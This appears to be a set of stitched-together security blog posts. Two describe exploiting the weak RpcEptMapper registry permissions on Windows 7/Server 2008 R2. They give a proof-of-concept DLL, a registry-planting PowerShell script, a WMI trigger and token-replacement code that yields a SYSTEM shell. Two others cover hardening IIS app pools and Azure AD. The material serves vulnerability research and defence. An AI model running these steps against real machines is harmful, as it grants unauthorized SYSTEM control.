Thanks to all the bits and pieces I was able to collect throughout the documentation, writing a simple Proof-of-Concept DLL should be pretty straightforward. But still, we need a plan!

When I need to exploit some sort of DLL hijacking vulnerability, I usually start with a simple and custom log helper function. The purpose of this function is to write some key information to a file whenever it’s invoked. Typically, I log the PID of the current process and the parent process, the name of the user that runs the process and the corresponding command line. I also log the name of the function that triggered this log event. This way, I know which part of the code was executed.

In my other articles, I always skipped the development part because I assumed that it was more or less obvious. But, I also want my blog posts to be beginner-friendly, so there is a contradiction. I will remedy this situation here by detailing the process. So, let’s fire up Visual Studio and create a new “C++ Console App” project. Note that I could have created a “Dynamic-Link Library (DLL)” project but I find it actually easier to just start with a console app.

Here is the initial code generated by Visual Studio:

#include <iostream>

int main()
{
    std::cout << "Hello World!\n";
}

Of course, that’s not what we want. We want to create a DLL, not an EXE, so we have to replace the main function with DllMain. You can find a skeleton code for this function in the documentation: Initialize a DLL.

#include <Windows.h>

extern "C" BOOL WINAPI DllMain(HINSTANCE const instance, DWORD const reason, LPVOID const reserved)
{
    switch (reason)
    {
    case DLL_PROCESS_ATTACH:
        Log(L"DllMain"); // See log helper function below
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

In parallel, we also need to change the settings of the project to specify that the output compiled file should be a DLL rather than an EXE. To do so, you can open the project properties and, in the “General” section, select “Dynamic Library (.dll)” as the “Configuration Type”. Right under the title bar, you can also select “All Configurations” and “All Platforms” so that this setting can be applied globally.

Next, I add my custom log helper function.

#include <Lmcons.h> // UNLEN + GetUserName
#include <tlhelp32.h> // CreateToolhelp32Snapshot()
#include <strsafe.h>

void Log(LPCWSTR pwszCallingFrom)
{
    LPWSTR pwszBuffer, pwszCommandLine;
    WCHAR wszUsername[UNLEN + 1] = { 0 };
    SYSTEMTIME st = { 0 };
    HANDLE hToolhelpSnapshot;
    PROCESSENTRY32 stProcessEntry = { 0 };
    DWORD dwPcbBuffer = UNLEN, dwBytesWritten = 0, dwProcessId = 0, dwParentProcessId = 0, dwBufSize = 0;
    BOOL bResult = FALSE;

    // Get the command line of the current process
    pwszCommandLine = GetCommandLine();

    // Get the name of the process owner
    GetUserName(wszUsername, &dwPcbBuffer);

    // Get the PID of the current process
    dwProcessId = GetCurrentProcessId();

    // Get the PID of the parent process
    hToolhelpSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    stProcessEntry.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hToolhelpSnapshot, &stProcessEntry)) {
        do {
            if (stProcessEntry.th32ProcessID == dwProcessId) {
                dwParentProcessId = stProcessEntry.th32ParentProcessID;
                break;
            }
        } while (Process32Next(hToolhelpSnapshot, &stProcessEntry));
    }
    CloseHandle(hToolhelpSnapshot);

    // Get the current date and time
    GetLocalTime(&st);

    // Prepare the output string and log the result
    dwBufSize = 4096 * sizeof(WCHAR);
    pwszBuffer = (LPWSTR)malloc(dwBufSize);
    if (pwszBuffer)
    {
        StringCchPrintf(pwszBuffer, dwBufSize, L"[%.2u:%.2u:%.2u] - PID=%d - PPID=%d - USER='%s' - CMD='%s' - METHOD='%s'\r\n",
            st.wHour,
            st.wMinute,
            st.wSecond,
            dwProcessId,
            dwParentProcessId,
            wszUsername,
            pwszCommandLine,
            pwszCallingFrom
        );

        LogToFile(L"C:\\LOGS\\RpcEptMapperPoc.log", pwszBuffer);

        free(pwszBuffer);
    }
}

Then, we can populate the DLL with the three functions we saw in the documentation. The documentation also states that they should return ERROR_SUCCESS if successful.

DWORD APIENTRY OpenPerfData(LPWSTR pContext)
{
    Log(L"OpenPerfData");
    return ERROR_SUCCESS;
}

DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned)
{
    Log(L"CollectPerfData");
    return ERROR_SUCCESS;
}

DWORD APIENTRY ClosePerfData()
{
    Log(L"ClosePerfData");
    return ERROR_SUCCESS;
}

Ok, so the project is now properly configured, DllMain is implemented, we have a log helper function and the three required functions. One last thing is missing though. If we compile this code, OpenPerfData, CollectPerfData and ClosePerfData will be available as internal functions only so we need to export them. This can be achieved in several ways. For example, you could create a DEF file and then configure the project appropriately. However, I prefer to use the __declspec(dllexport) keyword (doc), especially for a small project like this one. This way, we just have to declare the three functions at the beginning of the source code.

extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext);
extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned);
extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData();

If you want to see the full code, I uploaded it here.

Finally, we can select Release/x64 and “Build the solution”. This will produce our DLL file: .\DllRpcEndpointMapperPoc\x64\Release\DllRpcEndpointMapperPoc.dll.

Testing the PoC

Before going any further, I always make sure that my payload is working properly by testing it separately. The little time spent here can save a lot of time afterwards by preventing you from going down a rabbit hole during a hypothetical debug phase. To do so, we can simply use rundll32.exe and pass the name of the DLL and the name of an exported function as the parameters.

C:\Users\lab-user\Downloads\>rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData

Great, the log file was created and, if we open it, we can see two entries. The first one was written when the DLL was loaded by rundll32.exe. The second one was written when OpenPerfData was called. Looks good! :slightly_smiling_face:

[21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32  DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='DllMain'
[21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32  DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='OpenPerfData'

Ok, now we can focus on the actual vulnerability and start by creating the required registry key and values. We can either do this manually using reg.exe / regedit.exe or programmatically with a script. Since I already went through the manual steps during my initial research, I’ll show a cleaner way to do the same thing with a PowerShell script. Besides, creating registry keys and values in PowerShell is as easy as calling New-Item and New-ItemProperty, isn’t it? :thinking:

Requested registry access is not allowed… Hmmm, ok… It looks like it won’t be that easy after all. :stuck_out_tongue:

I didn’t really investigate this issue but my guess is that when we call New-Item, powershell.exe actually tries to open the parent registry key with some flags that correspond to permissions we don’t have.

Anyway, if the built-in cmdlets don’t do the job, we can always go down one level and invoke DotNet functions directly. Indeed, registry keys can also be created with the following code in PowerShell.

[Microsoft.Win32.Registry]::LocalMachine.CreateSubKey("SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance")

Here we go! In the end, I put together the following script in order to create the appropriate key and values, wait for some user input and finally terminate by cleaning everything up.

$ServiceKey = "SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance"

Write-Host "[*] Create 'Performance' subkey"
[void] [Microsoft.Win32.Registry]::LocalMachine.CreateSubKey($ServiceKey)
Write-Host "[*] Create 'Library' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Value "$($pwd)\DllRpcEndpointMapperPoc.dll" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Open' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Value "OpenPerfData" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Collect' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Value "CollectPerfData" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Close' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Value "ClosePerfData" -PropertyType "String" -Force | Out-Null

Read-Host -Prompt "Press any key to continue"

Write-Host "[*] Cleanup"
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Force
[Microsoft.Win32.Registry]::LocalMachine.DeleteSubKey($ServiceKey)

The last step now, how do we trick the RPC Endpoint Mapper service into loading our Performace DLL? Unfortunately, I haven’t kept track of all the different things I tried. It would have been really interesting in the context of this blog post to highlight how tedious and time consuming research can sometimes be. Anyway, one thing I found along the way is that you can query Perfomance Counters using WMI (Windows Management Instrumentation), which isn’t too surprising after all. More info here: WMI Performance Counter Types.

Counter types appear as the CounterType qualifier for properties in Win32_PerfRawData classes, and as the CookingType qualifier for properties in Win32_PerfFormattedData classes.

So, I first enumerated the WMI classes that are related to Performace Data in PowerShell using the following command.

Get-WmiObject -List | Where-Object { $_.Name -Like "Win32_Perf*" }

And, I saw that my log file was created almost right away! Here is the content of the file.

[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='DllMain'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='OpenPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'

I expected to get arbitary code execution as NETWORK SERVICE in the context of the RpcEptMapper service at most but, it looks like I got a much better result than anticipated. I actually got arbitrary code execution in the context of the WMI service itself, which runs as LOCAL SYSTEM. How amazing is that?! :sunglasses:

Note: if I had got arbirary code execution as NETWORK SERVICE, I would have been just a token away from the LOCAL SYSTEM account thanks to the trick that was demonstrated by James Forshaw a few months ago in this blog post: Sharing a Logon Session a Little Too Much.

I also tried to get each WMI class separately and I observed the exact same result.

Get-WmiObject Win32_Perf
Get-WmiObject Win32_PerfRawData
Get-WmiObject Win32_PerfFormattedData

Conclusion

I don’t know how this vulnerability has gone unnoticed for so long. One explanation is that other tools probably looked for full write access in the registry, whereas AppendData/AddSubdirectory was actually enough in this case. Regarding the “misconfiguration” itself, I would assume that the registry key was set this way for a specific purpose, although I can’t think of a concrete scenario in which users would have any kind of permissions to modify a service’s configuration.

I decided to write about this vulnerability publicly for two reasons. The first one is that I actually made it public - without initially realizing it - the day I updated my PrivescCheck script with the GetModfiableRegistryPath function, which was several months ago. The second one is that the impact is low. It requires local access and affects only old versions of Windows that are no longer supported (unless you have purchased the Extended Support…). At this point, if you are still using Windows 7 / Server 2008 R2 without isolating these machines properly in the network first, then preventing an attacker from getting SYSTEM privileges is probably the least of your worries.

Apart from the anecdotal side of this privilege escalation vulnerability, I think that this “Perfomance” registry setting opens up really interesting opportunities for post exploitation, lateral movement and AV/EDR evasion. I already have a few particular scenarios in mind but I haven’t tested any of them yet. To be continued?…

Links & Resources

Hands off my IIS accounts!

As promised in my previous post, I will (hopefully) give you some advices on how to harden the IIS “Application Pool” accounts aka “identities”.

First of all we need to understand how IIS architecture works and how identities are managed. Therefore I suggest you to read some specific posts about this topic for example this one and this one . More about identities can be found here

Ok! now that you got all the details let’s start from the IIS worker process “w3wp”. This is the process which will effectively access the http resources we asked for and serve them. By default this process runs under the “ApplicationPoolIdentity” identity. This is nothing more than (in this case the default) a “Virtual Account”, with the name of the Application Pool Identity, which IIS creates for us. Virtual accounts are directly managed by OS, so you don’t need to set passwords.

We can create dedicated Application Pools and assign them to web sites. Given that every application pool then has his own Virtual Account, we can secure access to resources based on the single application pool identity.

This is really cool, so we are able to set our security boundaries.

Let’s take a closer look at the process:

We can observe that the AppPool identity is member of the built in “IIS_IUSRS” group and also the “SERVICE” group. Unfortunately, it has also 2 dangerous privileges: SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege, probably the most abused privileges for escalations when you are able to get code execution on a buggy web application (in the following screenshot we uploaded a webshell), do you agree?

I think that everyone who is responsible / concerned for securing IIS Web Applications would like to limit these privileges, especially if they aren’t needed. In fact, the impersonation privileges are only useful if IIS needs to impersonate the Windows user who accessed the web app (<identity impersonate=true>), otherwise who cares?

So the first question is: is it safe to remove the privileges in this context?

There is no official documentation from MS about this, but there is not reason why it should lead to problems as long as you don’t need to impersonate

Now let’s see how privileges are configured.

We need to launch the Policy editor “gpedit.msc” and go to:

Computer Configuration->Windows Settings->Security Settings->Local Policies->User Right Assignment

This is the configuration for the “Impersonate a client after Authentication” (SeImpersonatePrivilege):

Bad news, IIS_IUSRS and SERVICE group have this privilege by default, and the Application Pools Identities belongs to these groups.

For the “Replace a process level token” (SeAssignPrimaryPrivilege) we have:

Again, our Applications Pool Identities and SERVICE groups have this privilege.

We could indeed inhibit the automatic membership to “IIS_IUSRS” group by modifying the appropriate xml file following MS official documentation (side note: I was not able to perform this action, got always an HTTP error 503 if set to “true”):

But this would not solve our problem given that the Application Pools Identities belongs to SERVICE group by default and we cannot remove this group from the Application Pool. Moreover, we cannot remove Impersonation Privileges for the SERVICE group.

So what can we do?

First of all we have to forget 😦 the Virtual Accounts and assign to our Application Pool a “real” Windows Account (just a standard user with a very strong password and set to “never expires”).

Let’s see the result:

The user (web) is no more member of the SERVICE group, this is a good starting point.

He is still member of IIS_IUSRS and IIS APPPOL\MyAppPool, so in order to remove our unwanted privileges, in the Group Policy Editor we have to:

  • Remove IIS_IUSRS from “Impersonate a Client after Authentication”
  • Remove IIS APPPOL\MyAppPool from “Replace a process level token”
  • restart the IIS services and observe the result..

Yes! privileges are no longer present, and is confirmed by listing the w3wp process tokens:

Now we can be more comfortable given that we have secured these accounts, isn’t it? Well … not exactly.. there are still a lot af nasty things you can do in session 0 .. more about this maybe in a future post 😉

An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability

A few days ago, I released Perfusion, an exploit tool for the RpcEptMapper registry key vulnerability that I discussed in my previous post. Here, I want to discuss the strategy I opted for when I developed the exploit. Although it is not as technical as a memory corruption exploit, I still learned a few tricks that I wanted to share.

In the Previous Episode…

Before we begin, here is a brief summary of my last blog post. On Windows 7 / Server 2008 R2, two service registry keys are configured with weak permissions: RpcEptMapper and DnsCache. Basically, these permissions provide a regular user with the ability to create subkeys. This issue is pretty simple to leverage. One just has to create a Performance key and populate it with a few values, among which is the absolute path of a Performance DLL. In order for this DLL to be loaded by a privileged user, one just has to query the Performnance counters of the machine (by invoking Get-WmiObject Win32_Perf in PowerShell for example). When doing so, the WMI service should load the DLL as NT AUTHORITY\SYSTEM and execute three predefined functions that must be exported by the library (and that are also configured in the Performance registry key).

WMI and the Performance Counters

The documentation states that “Windows Performance Counters provide a high-level abstraction layer that provides a consistent interface for collecting various kinds of system data such as CPU, memory, and disk usage. Further, in the About section, you can read that there are four main ways to use Performance counters, and one of them is through the WMI Performance Counter Classes. This is more or less how I found out that you could query these counters with Get-WmiObject Win32_Perf in PowerShell. This type of interaction is potentially very interesting because it involves a very common type of IPC (Inter-Process Communication) on Windows which is RPC (Remote Procedure Call), or more precisely DCOM (Distributed Component Object Model) in this case (DCOM works on top of RPC). Such mechanism is especially required when a low-privileged process needs to interact with a more privileged one, such as the WMI service in our case.

This explains why, as a regular user, we were able to force the WMI service to load our DLL. However, this type of trigger is a double-edged sword. Indeed, when I initially worked on the Proof-of-Concept, I noticed that, on rare occasions, the DLL would not be loaded as NT AUTHORITY\SYSTEM and the exploit would thus fail. Why is that? The answer is: “impersonation”.

When interacting with another process, especially if it is a privileged service, impersonation is very common. To understand why it is so important, you have to keep in mind that, whenever you invoke a Remote Procedure Call, you literally ask another process to execute some code and, often, using parameters that are under your control. If you are able to force a service to do things such as move an arbitrary file to an arbitrary location as NT AUTHORITY\SYSTEM for example, this can have nasty consequences. To solve this problem, the Windows API provides almost as many impersonation functions as there are IPC mechanisms. For instance, you can invoke ImpersonateNamedPipeClient as a named pipe server or RpcImpersonateClient as an RPC server.

In the case of the Performance counters, when you instantiate the remote class Win32_Perf, I observed that the WMI service sometimes creates a dedicated wmiprvse.exe process that runs as NT AUTHORITY\LOCAL SERVICE. In this case, it always impersonates the client, as illustrated on the screenshot below.

Honestly, I haven’t spent any time trying to figure out why the service would sometimes load the DLL as LOCAL SERVICE, or as SYSTEM on other occasions. What I observed though is that, if you wait long enough and then try again, the DLL would be loaded as SYSTEM. This was enough for me because I didn’t want to spend too much time on this as I have other (more interesting) projects I want to work on. Therefore, in the rest of this article, we will just consider that we have the ability to load our DLL in the context of NT AUTHORITY\SYSTEM.

Exploit Development

The idea is to build a standalone exploit. In other words, as a pentester, I want to be able to drop a simple executable on a vulnerable machine and just execute it to get a SYSTEM shell, without having to configure the registry manually or compile a DLL every time.

Now, in order to define a proper strategy to get there, we need to list the starting conditions. First, we know that a machine reboot is not required. We already know that the DLL loading can be triggered through the instantiation of a WMI class. This is very easy to do with a high-level script engine such as PowerShell but doing the same thing in C/C++ will probably require a bit of work. Then, we know that, although we modify the configuration of the RpcEptMapper (or DnsCache) service, the DLL is actually loaded by the WMI service. We will see why this is important in a moment. Last but not least, we want to be able to get a SYSTEM shell in our console but the DLL is actually loaded by a service in a totally different session, so we will have to find a way to solve this problem.

Instantiate a WMI Class in C/C++

I really want to emphasize that, when you use a command such as Get-WmiObject Win32_Perf in PowerShell, there is a loooooot of stuff going on under the hood. These cmdlets are extremely powerful and make the life of system administrators and developers a lot easier. Unless you have at least tried to develop a client program for a DCOM interface in C/C++, you cannot really realize that. Fortunately, the documentation provided by Microsoft is pretty good and contains several detailed examples. They even provide a complete code snippet. In order to help you realize what I’ve just said, you should just know that this sample code is written in more than 250 lines of C/C++ and that the only thing it does is query a single counter, whereas Get-WmiObject Win32_Perf actually collects all the available counters. To me, this is really mind-blowing!

In the end, here is a completely stripped-down version of the code I eventually came up with to trigger the DLL loading within the WMI service.

CoInitializeEx(NULL, COINIT_MULTITHREADED);
CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_NONE, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, 0);
CoCreateInstance(CLSID_WbemLocator, NULL, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (void**)&pWbemLocator);
bstrNameSpace = SysAllocString(L"\\\\.\\root\\cimv2");
pWbemLocator->ConnectServer(bstrNameSpace, NULL, NULL, NULL, 0L, NULL, NULL, &pNameSpace);
CoCreateInstance(CLSID_WbemRefresher, NULL, CLSCTX_INPROC_SERVER, IID_IWbemRefresher, (void**)&pRefresher);
pRefresher->QueryInterface(IID_IWbemConfigureRefresher, (void**)&pConfig);
pConfig->AddEnum(pNameSpace, L"Win32_Perf", 0, NULL, &pEnum, &lID);
pRefresher->Refresh(0L);
pEnum->GetObjects(0L, dwNumObjects, apEnumAccess, &dwNumReturned);

The first function calls are pretty standard when working with DCOM. CoInitializeEx and CoInitializeSecurity are necessary to set up a basic communication channel between the client and the DCOM server. Then the first CoCreateInstance gives you an initial pointer to the IWbemServices interface for WMI. This allows you to access the root/cimv2 namespace once you have invoked ConnectServer. If you have ever used WMI queries in PowerShell, this should sound familiar. After that, you can access the class you want. Here I picked Win32_Perf because I knew it already worked with Get-WmiObject Win32_Perf. Finally a first call to GetObjects is required to get the number of objects that will be returned by the server. This way, the client can allocate enough memory and then call GetObjects a second time to get the actual data. Yeah, we are doing quite low-level stuff in comparison to PowerShell so you have to do this kind of things yourself… Anyway, in our case, this second call is not required as the first one is enough to trigger the collection of the Performance counters’ data.

Communicate with the WMI Service (or not?)

Here comes the interesting part. This part is the true reason why I wanted to write about this particular exploit in the first place. Indeed, I used quite an unconventional trick to have a SYSTEM shell spawn in the same console.

When dealing with a privilege escalation exploit that involves DLL loading (in a privileged service), a very common problem arises, especially when you want to develop a standalone tool. From your exploit tool, how do you interact with the code that is executed within your DLL? Let’s say you want to spawn a SYSTEM command prompt. You can invoke CreateProcess for example but then… what? Well, good job, the command prompt has just spawned on the service’s Desktop (in session 0) and you have no way to interact with it. To solve this problem, exploit writers usually use IPC mechanisms to create a communication channel so that the client (i.e. the exploit) can interact with the server (i.e. the exploited service). For example, you can set up some named pipes, a main one to accept client requests and then three other ones so that the client can access the stdin/stdout/stderr I/O of the created process. This is actually how PsExec works by the way. The same thing can also be achieved using a TCP socket. From the exploited service (i.e. within the code of the DLL), you could bind to a local TCP port, create a process and then redirect its input/output to the socket. This way, a client just needs to connect to the local TCP port to interact with the created process. This is how bind shells work.

These are well-known techniques that I also used in previous exploits. This time though, I wanted to opt for something a bit different. And by “a bit different”, I actually mean “completely different” because I did not use any IPC mechanism at all! Or at least, not a conventional one…

In our scenario, as opposed to a typical DLL hijacking for example, we start with a significant advantage that I intentionally omitted to mention: we control the full path, and most importantly the name of the DLL that will be loaded by the privileged service. I insist on this detail because the name of the DLL itself can convey all the information we need, without having to rely on a standard IPC mechanism.

Here is the plan in a few basic steps:

  1. Create a process in the background, in a suspended state.
  2. Write the embedded DLL payload to an arbitrary location, such as the user’s Temp folder.
  3. Create the Performance subkey and populate it with the appropriate values, especially the path of the DLL file that was previously created.
  4. Instantiate the WMI class Win32_Perf to trigger the DLL loading.

At step 1, the idea is to spawn a cmd.exe Process for example. As a result of the CreateProcess call, you will get the handle and the ID that are associated to the created Process and its main Thread. At step 2, when writing the payload DLL to the disk, we will include the ID of the Process that has just been created in the name of the file (e.g.: performance_1234.dll). You’ll see why in a moment. Step 3 and 4 were already mentioned in the introduction and are rather self-explanatory.

From the service’s standpoint, the DLL will first be loaded and DllMain will be invoked. Then, it will call OpenPerfData, which is one of the three functions that are exported by our library. As a side note, this is particularly convenient because we can write our code outside of the loader lock. The OpenPerfData function is where our payload will be executed. From there, we can first retrieve the name of the module (i.e. the name of the DLL file). Since the filename contains the PID of the Process we initially created as a regular user, we will be able to perform some “adjustments” on it, in the context of NT AUTHORITY\SYSTEM.

What I mean by “adjustments” is that we will actually replace its primary Token

Replace a Process Level Token

As a reminder, on Windows, a Token represents the security context of a user in a Process or Thread. It holds some information such as the groups a user belongs to or the privileges it has. They can be of two types: Primary or Impersonation. A Primary Token is associated to a Process whereas an Impersonation Token is associated to a Thread. Thread level (i.e. Impersonation) Tokens are relevant when a service wants to impersonate a client for example. Process level Tokens, on the other hand, are not really meant to be replaced at runtime.

Before working on this exploit, my assumption was that, unlike Thread level Tokens, Process level Tokens were immutable. As soon as a Process is created, I thought that you could not change its Primary Token, unless you were able to execute some arbitrary code in the Kernel. But I was wrong! Though, in my defense, I have to say that this involves some undocumented stuff.

The exploit steps I mentioned previously should make a little more sense now. From within the DLL (i.e. in the context of the privileged service), here are the steps we need to follow:

  1. Create a copy of the current Process’ Token (by calling DuplicateTokenEx).
  2. Open the the client’s Process. We can do that because we know its PID.
  3. Replace the client’s Process Token with the one we created at step 1.

The first step is very simple and self-explanatory. Steps 2 and 3 are self-explanatory as well but they actually require very specific privileges. Fortunately for us, it seems that the Token of the WMI service’s Process has all the privileges that exist on Windows, as illustrated on the screenshot below. Anyway, as long as we execute arbitrary code in the context of NT AUTHORITY\SYSTEM we can recover any privilege we want.

Below is a stripped-down version of the code that allows us to replace the Token of the Process that was created by the client with the copy of the current SYSTEM Token. It should be noted that, for this operation to succeed, the target Process must be in a SUSPENDED state.

PROCESS_ACCESS_TOKEN tokenInfo = { 0 };
tokenInfo.Token = hSystemTokenDup;
tokenInfo.Thread = NULL;

NtSetInformationProcess(
    hClientProcess,                 // Client's Process handle (PROCESS_ALL_ACCESS)
    ProcessInformationClassMax,     // Type of information to set
    &tokenInfo,                     // A reference to a structure containing the SYSTEM Token handle
    sizeof(tokenInfo)               // Size of the structure
);

As briefly mentioned previously, the NtSetInformationProcess function is not documented. It is part of the Native API so it is not directly accessible within the Windows SDK. You have to define its prototype in your own header file and then import it manually from the NTDLL at runtime. Anyway, this function is very powerful as it allows you to change the Token of a Process, even after it has been created. Pretty cool, isn’t it?

Once this is done, the client can simply resume the main Thread and that’s it! You get a nice SYSTEM shell in your console.

Conclusion

There are some implementation steps I did not mention in this post because the main point was to discuss how we could develop an exploit that does not require IPC communications. For example, I used a Global Event in order to synchronize the main exploit with the payload that is executed within the DLL. But, the exploit would have worked without it as well.

Then, when I say that I did not use Inter-Process Communications, one could argue that it is not completely true because I did use the name of the DLL to convey some information in the end. But, it turns out that it is not strictly required either. You could still do the exact same thing without using this trick. For example, you could implement something very similar to a “egg hunter”. You could create an egg (e.g.: a predefined string) in the memory of your process and then, from within the DLL, you could open every single Process and search their memory to find this egg. From there, you can get the ID of the main Process and thus determine the ID of its child Process as well. It was just way more convenient to communicate the PID directly through the filename here.

With this little exploit development process, I learned a few things that I wanted to share. So, as always, I hope you have learned something too by reading this. That’s it for today!

Links & Resources

Hands off my (MS) cloud services!

Ok, this title is deliberately provocative, but the goal of this post is just to share some (as usual) “quick & dirty” tricks with all of you concerned about securing your Microsoft’s O365/Exchange/AzureAD online instances.

If you are facing the problem of having one or more services exposed on Microsoft cloud and want to have a clearer view of security configurations, it’s no easy to find the right path despite there are a ton of online resources about this subject.

Since I’m definitely not an expert, I often asked my friend @anformato for help and he always gave me useful tips. So when I later proposed him to write a post together on this topic in order to share “real life” experiences, he enthusiastically accepted.

In this first part we will talk about the Azure Active Directory “ecosystem”.

So let’s start from the beginning!

Azure Active Directory

Probably you have your on premise Active Directory Domain/Forest replicated with your online Azure AD instance, right?

Don’t replicate everything

You should carefully evaluate which objects you really need to synchronize and avoid to replicate everything. Remember “less is more”, and the more you replicate, the more you enlarge a possible attack surface.

Synchronize only the necessary objects (like users,) who really need to access online services. It’s also good practice not replicating administrators and other high privileged users. Azure AD admins should not be shared with on premise admins and vice versa (more on this in the dedicated chapter)

Replication can be easily configured with the “Azure Active Connect” tool:

Remember to perform this task before the first synchronization, otherwise it will be painful to remove unnecessary objects replicated to Azure AD (I had to open a case with MS support…)

Limit Administrative Access

Reducing the number of persistent Global Administrators is really a good practice.
Since only another GA can reset a global admin’s password, you should have at least 2 Global Admin users. (Microsoft recommends do not have more than 4/5 GAs, do you really need more than 5 GA’s?)

Azure AD roles allow you to grant granular permissions to your admins, providing you a way to implement the principle of least privilege. There are a bunch of predefined roles which you should definitely take in consideration for delegating administrative tasks.

A good starting point to understand Role Based Access control is here.

 
You should not use account with admin roles to manage administrative tasks, instead create dedicated accounts for each user with administrative privileges; those account should be cloud only account with no ties to on-premises Active Directory.
 
If your tenant has Azure Active Directory P2 licenses, a good practice is using Privileged Identity Management. It allows to implement just-in-time privileged access to Azure resources and Azure AD with approval flows.
 
All admin users must obviously use MFA, better with MS Authenticator App instead of using SMS or phone call as second authenticator factor. You should definitely avoid using personal account to manage M365 or Azure resources.
 
Last but not least: In order to prevent being accidentally locked out of your Azure Active Directory, have in place a procedure to manage emergency access. Ask yourself what will happen if service is currently unavailable because of network issue or IdP outage, or natural disaster emergency, or other GA users are not available?
Some procedures to manage emergency can be found here.

Restrict access to Azure Portal

By default, every Azure AD user can access the portal even without specific roles. This means they can access the entire directory and get information about AD settings including users, groups, and so on. You might argue, ok a standard Active Directory user can also access all this information on the on premise site, why should I care? Remember, your Azure AD is normally exposed all over the internet, so if the user is compromised it would be a juicy option for an attacker, do you agree? We will talk about it later..

Keep in mind that restricting access to portal does not block access to the various Azure API’s

Third party tools such as @_dirkjan fantastic “roadrecon“, which interacts with some “undocumented” MS Graph API , allow you to dump the whole directory for later investigations and analysis

Restrict access to MSOnline powershell module

This module provides a lot of powershell cmdlets for administering Azure AD. Even if it’s now deprecated, it’s still available and a standard user can by default access the MSOL service and run lot of “get-msol*” commands.

So the question is: how can we stop this? Well, the answer is very simple, as as an admin launch this command in an MSOL session:

This will prevent the possibility for a standard user (not admin) to read other user’s information and in fact inhibit most of the cmdlets:

And also block “roadrecon” tools:

..and AADinternals tools too:

This will also somehow “stop” the dangerous phishing technique via “device code authentication” as described here.

But keep in mind that it will not inhibit other operations, such as sending an email on behalf the victim once obtained the access token. For preventing such types of attacks you should implement dedicated “Conditional access policies”, available with Premium subscriptions.

Back to us, what could be the side effect by setting this flag? To be honest, it’s not so clear. Googling around you can find some old posts stating that if “UsersPermissionToReadOtherUsersEnabled is set to false in Azure Active Directory (AAD), users are unable to add external/internal members in Microsoft Teams”.

We were unable to reproduce this misbehavior with Teams and there is no official note from MS about this. It seems that this problem has been resolved.

You can also completely block access to all MSOL cmdlets, including admins, with the AzureADPreview module:

Know what you are doing because it seems that there is not the possibility to add exception (for example: admin users).

Restrict access to AzureAd powershell module

Given that this module will be the replacement of the MSOL module, if you already disabled the permissions in MSOL cmdlet, the API won’t be available also in AzureAD:

You can even restrict access to the Azure AD powershell by assigning roles, as described here

